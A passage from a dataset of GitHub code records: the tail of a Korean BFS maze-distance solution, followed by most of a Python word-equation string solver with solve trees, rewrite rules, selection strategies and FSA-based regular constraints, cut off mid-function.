nx >= n or ny <= -1 or ny >= m:\n continue\n\n if graph[nx][ny] == 0:\n continue\n\n # 처음 방문 시에만 최단 거리 기록\n if graph[nx][ny] == 1:\n graph[nx][ny] = graph[x][y] + 1\n queue.append((nx, ny))\n\n return graph[n - 1][m - 1]\n\n\nprint(bfs(0, 0))\n\n\n\"\"\"\n 문제 해결 아이디어\n\n BFS는 시작 지점에서 가까운 노드부터 차례대로 그래프의 모든 노드를 탐색함.\n\n 상, 하, 좌, 우로 연결된 모든 노드로의 거리가 1로 동일함\n - 따라서 (1, 1) 지점부터 BFS를 수행하여 모든 노드의 최단 거리 값을 기록하면 해결할 수 있음.\n\n\"\"\"\n","repo_name":"JngMkk/Algorithm","sub_path":"Algorithm/BFSAndDFS/BFS02.py","file_name":"BFS02.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42289174523","text":"from enum import Enum, unique, auto\nfrom functools import reduce\nfrom itertools import chain, combinations\nfrom typing import List, Tuple, Dict, Set, Optional\n\nimport random\nfrom graphviz import Digraph\nfrom lenc import LengthConstraint, print_length_constraints_as_strings, internal_len_var_name\nfrom prob import Problem, ValueType, internal_str_var_origin_name\nfrom we import WordEquation, StrElement, StrVariable, is_var, is_del, is_char\nfrom fsa import FSA, from_str, remove_first_char, split_by_states, FsaClassification\n\n\n@unique\nclass Rewrite(Enum):\n lvar_be_empty = auto()\n rvar_be_empty = auto()\n lvar_be_char = auto()\n rvar_be_char = auto()\n lvar_be_rvar = auto()\n lvar_longer_char = auto()\n rvar_longer_char = auto()\n lvar_longer_var = auto()\n rvar_longer_var = auto()\n allvar_be_empty = auto()\n on_the_fly_quadratic = auto()\n\n\nclass Strategy(Enum):\n full = auto()\n first = auto()\n shortest = auto()\n shortest_side = auto()\n one_elem_first = auto()\n var_char_first = auto()\n var_var_first = auto()\n empty_vars_first = auto()\n customized = auto()\n\n def __str__(self):\n return self.name\n\n\nclass QuadraticStrategy(Enum):\n same_first = auto()\n same_short = auto()\n same_short_side = auto()\n first = auto()\n shortest = auto()\n shortest_side = auto()\n\n def __str__(self):\n return self.name\n\nTransformRecord = Tuple[Optional[StrElement], Optional[StrElement]]\nRegConstraintClasses = Dict[str, int]\nRegConstraints = Dict[str, FSA]\n\nfsa_classification = FsaClassification() # Object storing FSA classifications\n\n\nclass SolveTreeNode:\n 
success_we: WordEquation = WordEquation([], [])\n\n def __init__(self, word_equations: List[WordEquation], reg_constraints: Optional[Dict[str, FSA]] = None,\n var_rename_count: Optional[Dict[str, int]] = None):\n self.word_equations = word_equations\n self.reg_constraints: [RegConstraints] = reg_constraints\n if reg_constraints: # there are regular constraint\n self.regc_classes: [RegConstraintClasses] = dict()\n self.regc_classes = dict()\n for name in reg_constraints:\n self.regc_classes[name] = fsa_classification.get_classification(reg_constraints[name])\n else:\n self.regc_classes: [RegConstraintClasses] = None\n if var_rename_count:\n self.var_rename_count = {v: var_rename_count[v] for v in var_rename_count} # make a copy\n else:\n self.var_rename_count: Dict[str, int] = {v.value: 0 for v in self.variables()} # for on-the-fly quadratic\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n if self.regc_classes and other.regc_classes:\n return set(self.word_equations) == set(other.word_equations) and\\\n same_reg_constraints(self.reg_constraints, other.reg_constraints)\n elif not self.regc_classes and not other.regc_classes:\n return set(self.word_equations) == set(other.word_equations)\n return False\n\n def __len__(self):\n return sum(map(len, self.word_equations))\n\n def __bool__(self):\n return True\n\n def __str__(self):\n if self.reg_constraints:\n return '\\n'.join(map(str, self.word_equations)) + ':\\n' +\\\n '\\n'.join([f'{s}:\\n{str(self.reg_constraints[s])}' for s in sorted(self.reg_constraints)])\n else:\n return '\\n'.join([str(e) for e in self.word_equations]) + ':{{}}'\n\n def __repr__(self):\n if self.regc_classes:\n return ','.join(map(str, self.word_equations)) + ':{{' +\\\n ','.join([f'{s}:{self.regc_classes[s]}' for s in sorted(self.regc_classes)]) +\\\n '}'\n else:\n return ','.join(map(str, self.word_equations)) + ':{{}}'\n\n def __hash__(self):\n return hash(repr(self))\n\n def variables(self) -> Set[StrVariable]:\n return reduce(lambda x, y: x | y, [e.variables() for e in self.word_equations])\n\n def var_occurrence(self, elem: Optional[StrVariable] = None):\n if elem: # if elem is specified, count occurrence for elem\n return sum([we.var_occurrence(elem) for we in self.word_equations])\n else: # if elem is not specified, count occurrence for all string variables\n return sum([we.var_occurrence() for we in self.word_equations])\n\n def is_success_node(self):\n # return reduce(lambda x, y: x and y, map(lambda x: x == self.success_we, self.word_equations))\n return reduce(lambda x, y: x and y, [e == self.success_we for e in self.word_equations])\n\n def is_unsolvable_node(self):\n if self.reg_constraints:\n return reduce(lambda x, y: x or y,\n [we.is_simply_unequal() or we.is_empty_constant() for we in self.word_equations] +\n [self.reg_constraints[n].is_empty() for n in self.reg_constraints])\n else:\n return reduce(lambda x, y: x or y,\n [we.is_simply_unequal() or we.is_empty_constant() for we in self.word_equations])\n\n def get_word_equations_to_solve(self) -> List[WordEquation]:\n return [we for we in self.word_equations if we != self.success_we and not we.is_simply_unequal()]\n\n def pick_first_word_equation(self) -> Optional[WordEquation]:\n candidates = [we for we in self.word_equations if we != self.success_we and not we.is_simply_unequal()]\n if len(candidates) > 0:\n return candidates[0]\n else:\n return None\n\n def pick_var_char_word_equation(self) -> Optional[WordEquation]:\n candidates = [we for we in self.word_equations if we != 
self.success_we and not we.is_simply_unequal()]\n group1 = [we for we in candidates if we.is_char_var_headed() or we.is_var_char_headed() or we.has_emptiness()]\n if len(group1) > 0:\n return group1[0]\n else:\n return None\n\n def pick_var_var_word_equation(self) -> Optional[WordEquation]:\n candidates = [we for we in self.word_equations if we != self.success_we and not we.is_simply_unequal()]\n group1 = [we for we in candidates if we.is_both_var_headed()]\n if len(group1) > 0:\n return group1[0]\n else:\n return None\n\n def pick_shortest_word_equation(self, side: bool = False) -> Optional[WordEquation]:\n candidates = [we for we in self.word_equations if we != self.success_we and not we.is_simply_unequal()]\n if len(candidates) > 0:\n if side: # seek the lower side length of a word equation\n candidates_len = [we.min_side_len() for we in candidates]\n else: # seek the total length of a word equation\n candidates_len = [len(we) for we in candidates]\n min_idx = candidates_len.index(min(candidates_len))\n return candidates[min_idx]\n else:\n return None\n\n def pick_one_elem_word_equation(self) -> Optional[WordEquation]: # only one or zero element in one side\n candidates = [we for we in self.word_equations if we != self.success_we and not we.is_simply_unequal()]\n group1 = [we for we in candidates if len(we.lhs) <= 1 or len(we.rhs) <= 1]\n if len(group1) > 0:\n return group1[0]\n else:\n return None\n\n\ndef same_reg_constraints(regc1: Dict[str, int], regc2: Dict[str, int]) -> bool:\n # check for (1) the same set of keys (2) for each key, classifications of FSA are the same\n return regc1.keys() == regc2.keys() and \\\n sum([1 for e in regc1 if e in regc2 and regc1[e] == regc2[e]]) == len(regc1.keys())\n\n\nclass Transform:\n def __init__(self, source: SolveTreeNode, rewrite: Rewrite,\n record: TransformRecord):\n self.source: SolveTreeNode = source\n self.rewrite: Rewrite = rewrite\n self.record = record\n\n def __eq__(self, other):\n if isinstance(other, self.__class__):\n return (self.source == other.source and\n self.rewrite == other.rewrite and\n self.record == other.record)\n return False\n\n def __str__(self):\n return f'{self.source}, {self.rewrite}, {self.record}'\n\n def __repr__(self):\n return f'{repr(self.source)}, {repr(self.rewrite)}, {repr(self.record)}'\n\n def __hash__(self):\n return hash(repr(self))\n\n\n# this function can be removed later\ndef solution_word_equations(wes: List[WordEquation]) -> bool:\n success_we: WordEquation = WordEquation([], [])\n return reduce(lambda x, y: x and y, map(lambda x: x == success_we, wes))\n\n\nclass SolveTree:\n # success_end: WordEquation = WordEquation([], [])\n\n def __init__(self, root: SolveTreeNode):\n self.root: SolveTreeNode = root\n self.node_relations: Dict[SolveTreeNode, Set[Transform]] = {}\n\n def has_node(self, node: SolveTreeNode):\n return node in self.node_relations\n\n def has_solution(self) -> bool:\n # return reduce(lambda x, y: x or y,\n # [node.is_success_node() for node in self.node_relations.keys()])\n return len([node for node in self.node_relations.keys() if node.is_success_node()]) > 0\n\n def get_solution_node(self) -> Set[SolveTreeNode]:\n return set(e for e in self.node_relations if e.is_success_node())\n\n def add_node(self, src: SolveTreeNode, node: SolveTreeNode, rewrite: Rewrite,\n record: TransformRecord) -> bool:\n transform = Transform(src, rewrite, record)\n if self.has_node(node):\n self.node_relations[node].add(transform)\n return False\n else:\n self.node_relations[node] = {transform}\n 
return True # True means a new node relation is created\n\n def num_transitions(self):\n return sum(map(len, self.node_relations.values()))\n\n def num_nodes(self):\n return len(self.node_relations.keys() |\n {t.source for e in self.node_relations for t in self.node_relations[e]})\n # all_nodes = set()\n # for node in self.node_relations:\n # all_nodes.add(node)\n # for t in self.node_relations[node]:\n # all_nodes.add(t.source)\n # return len(all_nodes)\n\n\nclass InvalidProblemError(Exception):\n pass\n\n\ndef node_with_new_reg_constraints(wes: List[WordEquation], node: SolveTreeNode, fsa: [FSA],\n var_name: str, process_type: str = 'copy') -> [SolveTreeNode]:\n regc_old = node.reg_constraints\n regc_new: RegConstraints = dict()\n if process_type == 'check':\n for r in regc_old:\n if r == var_name: # check {var_name}'s fsa inclusion, then update\n tmp_fsa = regc_old[r].intersect(fsa)\n tmp_fsa.prune()\n if tmp_fsa.is_empty(): # inclusion is empty, transform failed\n return None\n else: # inclusion ok, update\n regc_new[r] = tmp_fsa\n else: # other variables, copy\n regc_new[r] = regc_old[r]\n if var_name not in regc_old: # in case {var_name} has no regular constraint yet, do update\n regc_new[var_name] = fsa\n elif process_type == 'copy':\n for r in regc_old:\n regc_new[r] = regc_old[r]\n elif process_type == 'update': # do copy first, then update {var_name}'s fsa\n for r in regc_old:\n regc_new[r] = regc_old[r]\n regc_new[var_name] = fsa # update after for-loop, in case {var_name} has no regular constraint yet\n return SolveTreeNode(wes, regc_new, node.var_rename_count)\n\n\nclass BasicSolver:\n def __init__(self, prob: Problem):\n if len(prob.word_equations) < 1:\n raise InvalidProblemError()\n node = SolveTreeNode([e.trim_prefix() for e in prob.word_equations],\n prob.merge_reg_constraints()) # root node\n self.pending_checks: List[SolveTreeNode] = [node]\n self.resolve: SolveTree = SolveTree(node)\n if prob.has_reg_constraints(): # has membership(regular) constraints\n self.alphabet = list(node.reg_constraints.values())[0].alphabet\n self.empty_str_fsa = from_str('', self.alphabet)\n self.fsa_classes: FsaClassification = fsa_classification\n else:\n self.alphabet = None\n self.empty_str_fsa = None\n self.problem = prob # reference to problem data (for on_the_fly_quadratic)\n self.strategy = Strategy.first # word equation selection strategies\n self.disable_var_empty_transform = False # special flag\n self.on_the_fly_quadratic = False # incrementally turning word equations to quadratic during transform\n self.quadratic_strategy = QuadraticStrategy.same_first # strategy for on-the-fly quadratic\n self.debug = False # for printing debug info, False by default\n\n def transform_with_emptiness(self, node: SolveTreeNode, we: WordEquation):\n if self.disable_var_empty_transform:\n return\n lh, rh = hh = we.peek()\n if (not lh or is_del(lh)) and rh and is_var(rh):\n new_wes = [e.remove_element_from_all(rh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, new_wes, Rewrite.rvar_be_empty, hh)\n elif (not rh or is_del(rh)) and lh and is_var(lh):\n new_wes = [e.remove_element_from_all(lh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, new_wes, Rewrite.lvar_be_empty, hh)\n else:\n assert False\n\n def transform_both_var_case(self, node: SolveTreeNode, we: WordEquation):\n lh, rh = hh = we.peek()\n\n if not self.disable_var_empty_transform:\n case1_wes = [e.remove_element_from_all(lh).trim_prefix() for e in node.word_equations]\n 
self.process_reg_constraints(node, case1_wes, Rewrite.lvar_be_empty, hh)\n\n case2_wes = [e.remove_element_from_all(rh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case2_wes, Rewrite.rvar_be_empty, hh)\n\n case3_wes = [e.replace(lh, rh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case3_wes, Rewrite.lvar_be_rvar, hh)\n\n if self.on_the_fly_quadratic and node.var_occurrence(lh) > 2:\n new_node, lh_new = turn_one_var_to_quadratic(lh, we, node, self.problem,\n self.quadratic_strategy, self.debug)\n if self.debug:\n print(f'\\nperform on-the-fly quadratic: {lh} in case lvar_longer_var')\n print(f'old node:\\n{print_solve_tree_node_pretty(node)}')\n print(f'node.var_rename_count:\\n{node.var_rename_count}')\n print(f'new node:\\n{print_solve_tree_node_pretty(new_node)}')\n print(f'new_node.var_rename_count:\\n{new_node.var_rename_count}')\n self.resolve.add_node(node, new_node, Rewrite.on_the_fly_quadratic, (lh, lh_new)) # add new_node directly\n # proceed to transform case Rewrite.lvar_longer_var\n case4_wes = [e.replace_with(lh, [rh, lh]).trim_prefix() for e in new_node.word_equations]\n self.process_reg_constraints(new_node, case4_wes, Rewrite.lvar_longer_var, hh)\n else:\n case4_wes = [e.replace_with(lh, [rh, lh]).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case4_wes, Rewrite.lvar_longer_var, hh)\n\n if self.on_the_fly_quadratic and node.var_occurrence(rh) > 2:\n new_node, rh_new = turn_one_var_to_quadratic(rh, we, node, self.problem,\n self.quadratic_strategy, self.debug)\n if self.debug:\n print(f'\\nperform on-the-fly quadratic: {rh} in case rvar_longer_var')\n print(f'old node:\\n{print_solve_tree_node_pretty(node)}')\n print(f'node.var_rename_count:\\n{node.var_rename_count}')\n print(f'new node:\\n{print_solve_tree_node_pretty(new_node)}')\n print(f'new_node.var_rename_count:\\n{new_node.var_rename_count}')\n self.resolve.add_node(node, new_node, Rewrite.on_the_fly_quadratic, (rh, rh_new)) # add new_node directly\n # proceed to transform case Rewrite.rvar_longer_var\n case5_wes = [e.replace_with(rh, [lh, rh]).trim_prefix() for e in new_node.word_equations]\n self.process_reg_constraints(new_node, case5_wes, Rewrite.rvar_longer_var, hh)\n else:\n case5_wes = [e.replace_with(rh, [lh, rh]).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case5_wes, Rewrite.rvar_longer_var, hh)\n\n def transform_char_var_case(self, node: SolveTreeNode, we: WordEquation):\n lh, rh = hh = we.peek()\n\n if not self.disable_var_empty_transform:\n case1_wes = [e.remove_element_from_all(rh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case1_wes, Rewrite.rvar_be_empty, hh)\n\n case2_wes = [e.replace(rh, lh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case2_wes, Rewrite.rvar_be_char, hh)\n\n case3_wes = [e.replace_with(rh, [lh, rh]).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case3_wes, Rewrite.rvar_longer_char, hh)\n\n def transform_var_char_case(self, node: SolveTreeNode, we: WordEquation):\n lh, rh = hh = we.peek()\n\n if not self.disable_var_empty_transform:\n case1_we = [e.remove_element_from_all(lh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case1_we, Rewrite.lvar_be_empty, hh)\n\n case2_we = [e.replace(lh, rh).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case2_we, Rewrite.lvar_be_char, 
hh)\n\n case3_we = [e.replace_with(lh, [rh, lh]).trim_prefix() for e in node.word_equations]\n self.process_reg_constraints(node, case3_we, Rewrite.lvar_longer_char, hh)\n\n def transform_all_vars_empty(self, node: SolveTreeNode):\n # perform transform towards each element of the powerset of variables of given node\n variables = node.variables()\n vars_ps = powerset(variables)\n for vars_tuple in vars_ps:\n # perform element removal towards all variables of each tuple, then proceed to construction of solve tree\n if self.debug:\n print(f'vars_tuple: {vars_tuple}')\n wes = [e.remove_element_from_all(vars_tuple[0]).trim_prefix() for e in node.word_equations]\n for i in range(1, len(vars_tuple)):\n wes = [e.remove_element_from_all(vars_tuple[i]).trim_prefix() for e in wes]\n self.process_reg_constraints(node, wes, Rewrite.allvar_be_empty, (None, None))\n if self.debug:\n print('transform powerset of all variables empty at first.')\n print(f' number of veriables: {len(variables)}')\n print(f' number of pending check nodes: {len(self.pending_checks)}')\n print(f' current number of nodes: {self.resolve.num_nodes()}')\n nodes = [node for node in self.pending_checks if not node.is_unsolvable_node()]\n for n in nodes:\n print(f'{print_solve_tree_node_pretty(n)}\\n')\n input('pause... press enter to continue')\n\n def process_reg_constraints(self, node: SolveTreeNode, wes: List[WordEquation], rewrite: Rewrite,\n record: TransformRecord):\n if not node.reg_constraints: # if no regular constraints at first, don't process regular constraints\n new_node = SolveTreeNode(wes, var_rename_count=node.var_rename_count)\n # print(f'process_reg_constratins: new_node: {print_solve_tree_node_pretty(new_node)}')\n self.update_solve_tree(node, new_node, rewrite, record)\n return # case end: no regular constraints\n\n # process regular constraints according to rewrite cases and construct {regc_new}\n regc: RegConstraints = node.reg_constraints\n if rewrite == Rewrite.lvar_be_empty:\n # check inclusion of empty fsa for {lvar}\n fsa_tmp = self.empty_str_fsa\n var_name = record[0].value\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'check')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.rvar_be_empty:\n # check inclusion of empty fsa for {rvar}\n fsa_tmp = self.empty_str_fsa\n var_name = record[1].value\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'check')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.lvar_be_char:\n # check inclusion of a fsa accepting only one char for {lvar}\n var_name, ch = record[0].value, record[1].value\n fsa_tmp = from_str(ch, self.alphabet)\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'check')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.rvar_be_char:\n # check inclusion of a fsa accepting only one char for {rvar}\n var_name, ch = record[1].value, record[0].value\n fsa_tmp = from_str(ch, self.alphabet)\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'check')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.lvar_be_rvar:\n # check inclusion of a fsa accepting {rvar} for {lvar}\n var_l, var_r = record[0].value, record[1].value\n if var_r in regc: # if {rvar} has regular constraint, check inclusion\n fsa_tmp = regc[var_r]\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_l, 'check')\n else: # if {rvar} has no regular 
constraint, just copy\n new_node = node_with_new_reg_constraints(wes, node, None, var_l, 'copy')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.lvar_longer_char:\n # get a new fsa by removing the first char {rvar} from the fsa of {lvar}\n var_name, ch = record[0].value, record[1].value\n if var_name in regc:\n fsa_tmp = remove_first_char(regc[var_name], ch)\n if fsa_tmp:\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'update')\n else:\n return # transform failed (constraint violation)\n else:\n new_node = node_with_new_reg_constraints(wes, regc, None, var_name, 'copy')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.rvar_longer_char:\n # get a new fsa by removing the first char {lvar} from the fsa of {rvar}\n var_name, ch = record[1].value, record[0].value\n if var_name in regc:\n fsa_tmp = remove_first_char(regc[var_name], ch)\n if fsa_tmp:\n new_node = node_with_new_reg_constraints(wes, node, fsa_tmp, var_name, 'update')\n else:\n return # transform failed (constraint violation)\n else:\n new_node = node_with_new_reg_constraints(wes, node, None, var_name, 'copy')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.lvar_longer_var:\n # get a set of pair of fsa for ({rvar},{lvar}) by splitting the constraint of {lvar}\n var_l, var_r = record[0].value, record[1].value\n new_node = None\n if var_l in regc: # {var_l} has regular constraint, need to do split\n fsa_paris = split_by_states(regc[var_l])\n for fsa_r, fsa_l in fsa_paris:\n new_node = node_with_new_reg_constraints(wes, node, fsa_l, var_l, 'check')\n if new_node:\n # this function call will update fsa of {var_r} if it has no regular constraint yet\n new_node = node_with_new_reg_constraints(wes, new_node, fsa_r, var_r, 'check')\n else: # no need to update/check regular constraints\n new_node = node_with_new_reg_constraints(wes, node, None, var_l, 'copy')\n self.update_solve_tree(node, new_node, rewrite, record)\n elif rewrite == Rewrite.rvar_longer_var:\n # get a set of pair of fsa for ({rvar},{lvar}) by splitting the constraint of {rvar}\n var_l, var_r = record[0].value, record[1].value\n new_node = None\n if var_r in regc: # {var_r} has regular constraint, need to do split\n fsa_paris = split_by_states(regc[var_r])\n for fsa_l, fsa_r in fsa_paris:\n new_node = node_with_new_reg_constraints(wes, node, fsa_r, var_r, 'check')\n if new_node:\n # this function call will update fsa of {var_r} if it has no regular constraint yet\n new_node = node_with_new_reg_constraints(wes, new_node, fsa_l, var_l, 'check')\n else: # no need to update/check regular constraints\n new_node = node_with_new_reg_constraints(wes, node, None, var_r, 'copy')\n self.update_solve_tree(node, new_node, rewrite, record)\n\n def update_solve_tree(self, node: SolveTreeNode, new_node: Optional[SolveTreeNode], rewrite: Rewrite,\n record: TransformRecord):\n if self.debug:\n print('----- debug info -----')\n print(f'from node:\\n{print_solve_tree_node_simple(node)}')\n if new_node:\n print(f'to node:\\n{print_solve_tree_node_simple(new_node)}')\n else:\n print('to node: None')\n print(f'rewrite: {rewrite}')\n print(f'head: {record}')\n if new_node:\n # if len(node) < len(new_node): # len returns the total length of all word equations of a node\n # print(\"Warning: word equation is not quadratic\")\n # print(f'old we: length = {len(node)}\\n{node.word_equations}')\n # print(f'new we: length = {len(new_node)}\\n{new_node.word_equations}')\n # 
exit(1)\n if node.var_occurrence() < new_node.var_occurrence(): # compare the total numbers of occurrences of string variables\n print(\"Warning: word equation is not quadratic\")\n print(f'old we: string variable occurrences = {node.var_occurrence()}\\n{node.word_equations}')\n print(f'new we: string variable occurrences = {new_node.var_occurrence()}\\n{new_node.word_equations}')\n exit(1)\n if self.resolve.add_node(node, new_node, rewrite, record):\n self.pending_checks.append(new_node)\n if self.debug:\n print('new node')\n else:\n if self.debug:\n print('existing node')\n\n def process_node(self, curr_node: SolveTreeNode, curr_we: WordEquation) -> SolveTree:\n if curr_we.has_emptiness():\n if self.debug:\n print('transform case: has emptiness')\n self.transform_with_emptiness(curr_node, curr_we)\n elif curr_we.is_both_var_headed():\n if self.debug:\n print('transform case: variable-variable')\n self.transform_both_var_case(curr_node, curr_we)\n elif curr_we.is_char_var_headed():\n if self.debug:\n print('transform case: char-variable')\n self.transform_char_var_case(curr_node, curr_we)\n elif curr_we.is_var_char_headed():\n if self.debug:\n print('transform case: variable-char')\n self.transform_var_char_case(curr_node, curr_we)\n else:\n assert False\n return self.resolve\n\n def solve_full(self, node: SolveTreeNode):\n # strategy 1: proceed transform on all word equations of a node\n wes = node.get_word_equations_to_solve()\n for we in wes:\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n if self.debug:\n # print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n\n def solve_first(self, node: SolveTreeNode):\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve_var_char_first(self, node: SolveTreeNode):\n we = node.pick_var_char_word_equation()\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve_var_var_first(self, node: SolveTreeNode):\n we = node.pick_var_var_word_equation()\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... 
press enter to continue')\n\n def solve_shortest(self, node: SolveTreeNode):\n we = node.pick_shortest_word_equation()\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve_shortest_side(self, node: SolveTreeNode):\n we = node.pick_shortest_word_equation(side=True)\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve_one_elem_first(self, node: SolveTreeNode):\n we = node.pick_one_elem_word_equation()\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... press enter to continue')\n\n def solve_customized(self, node: SolveTreeNode): # one element side first, then shortest side\n we = node.pick_one_elem_word_equation()\n if not we:\n we = node.pick_shortest_word_equation(side=True)\n if not we:\n we = node.pick_first_word_equation()\n if not we: # this shall not happen (supposed to be filtered)\n assert False\n self.process_node(node, we)\n if self.debug:\n print(f'number of pending check nodes: {len(self.pending_checks)}')\n print(f'current number of nodes: {self.resolve.num_nodes()}')\n # input('pause... 
press enter to continue')\n\n def solve(self):\n while self.pending_checks:\n node = self.pending_checks.pop(0)\n if node.is_success_node():\n if self.debug:\n print('transform case: success node')\n print(print_solve_tree_node_pretty(node))\n continue\n elif node.is_unsolvable_node():\n if self.debug:\n print('transform case: unsolvable node')\n print(print_solve_tree_node_pretty(node))\n continue\n # separate different strategies\n if self.strategy == Strategy.full:\n self.solve_full(node)\n elif self.strategy == Strategy.first:\n self.solve_first(node)\n elif self.strategy == Strategy.shortest:\n self.solve_shortest(node)\n elif self.strategy == Strategy.shortest_side:\n self.solve_shortest_side(node)\n elif self.strategy == Strategy.one_elem_first:\n self.solve_one_elem_first(node)\n elif self.strategy == Strategy.var_char_first:\n self.solve_var_char_first(node)\n elif self.strategy == Strategy.var_var_first:\n self.solve_var_var_first(node)\n elif self.strategy == Strategy.empty_vars_first:\n self.transform_all_vars_empty(node) # only do this once on root node\n self.pending_checks.append(node) # root node should be processed with normal transform rules\n self.disable_var_empty_transform = True\n self.strategy = Strategy.first # use strategy first for the rest nodes\n elif self.strategy == Strategy.customized:\n self.solve_customized(node)\n else:\n assert False\n\n\n# powerset without empty set, returns list of tuples\ndef powerset(iterable): # powerset({1,2,3}) --> (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)\n s = list(iterable)\n return list(chain.from_iterable(combinations(s, r) for r in range(1, len(s)+1)))\n\n\n# functions for turn word equations to linear/quadratic form\ndef turn_to_linear_wes(prob: Problem, wes: Optional[List[WordEquation]] = None):\n tgt_wes = wes or prob.word_equations\n occurred_var: Set[StrElement] = set()\n\n def _turn_to_linear(expr):\n nonlocal occurred_var\n for index, e in enumerate(expr):\n if e in occurred_var:\n var_copy_name = prob.new_variable(ValueType.string, e.value)\n e_copy = StrVariable(var_copy_name)\n expr[index] = e_copy\n lc = LengthConstraint([e.length()], [e_copy.length()])\n prob.add_length_constraint(lc)\n reg_cons = prob.reg_constraints\n if e.value in reg_cons:\n reg_cons[e_copy.value] = reg_cons[e.value]\n elif is_var(e):\n occurred_var.add(e)\n\n for we in tgt_wes:\n _turn_to_linear(we.lhs)\n _turn_to_linear(we.rhs)\n\n\n# rename a string variable if it occurs more than twice in a node, then return the new node\ndef turn_one_var_to_quadratic(var: StrVariable, selected_we: WordEquation, node: SolveTreeNode, prob: Problem,\n q_strategy: QuadraticStrategy, debug: bool = False) -> Tuple[SolveTreeNode, str]:\n assert node.var_occurrence(var) > 2 # make sure there are more than two occurrences of var\n\n # duplicate a new node, make sure word equations are duplicated\n ret_node = SolveTreeNode(\n [WordEquation(lhs, rhs) for lhs, rhs in [we.copy_expressions() for we in node.word_equations]],\n node.reg_constraints, node.var_rename_count)\n\n # positions where var in word equations of ret_node\n # format: (idx of word equation, lhs(0) or rhs(1), idx of word expression)\n var_we_pos_idx = [elem for line in [[(i, 0, i0) for i0, e0 in enumerate(we.lhs) if e0 == var] +\n [(i, 1, i1) for i1, e1 in enumerate(we.rhs) if e1 == var]\n for i, we in enumerate(ret_node.word_equations)] for elem in line]\n # print(print_word_equation_list_pretty(ret_node.word_equations))\n # print(f'var_we_pos_idx: {var_we_pos_idx}')\n\n # make new variable for 
quadratic replacement. also update length and regular constraints\n var_original_name = internal_str_var_origin_name(var.value)\n var_name = var_original_name if var_original_name else var.value\n ret_node.var_rename_count[var_name] += 1\n var_new_name = prob.new_variable(ValueType.string, var_name, ret_node.var_rename_count[var_name])\n if debug:\n print('----- turn_one_var_to_quadratic() -----')\n print(f'var.value: {var.value}')\n print(f'var_original_name: {var_original_name}')\n print(f'var_name: {var_name}')\n print(f'var_new_name: {var_new_name}')\n print('before turn quadratic')\n print(print_word_equation_list_pretty(ret_node.word_equations))\n print(f'var_we_pos_idx: {var_we_pos_idx}')\n\n new_var = StrVariable(var_new_name)\n\n lc = LengthConstraint([var.length()], [new_var.length()])\n if lc not in prob.len_constraints:\n prob.add_length_constraint(lc)\n if ret_node.reg_constraints:\n reg_cons = ret_node.reg_constraints\n if var.value in reg_cons:\n reg_cons[new_var.value] = reg_cons[var.value]\n\n # replace var to new_var for quadratic\n # don't replace 1: the string variable to be transform (head of the selected word equation)\n lh, rh = selected_we.peek()\n we_idx = 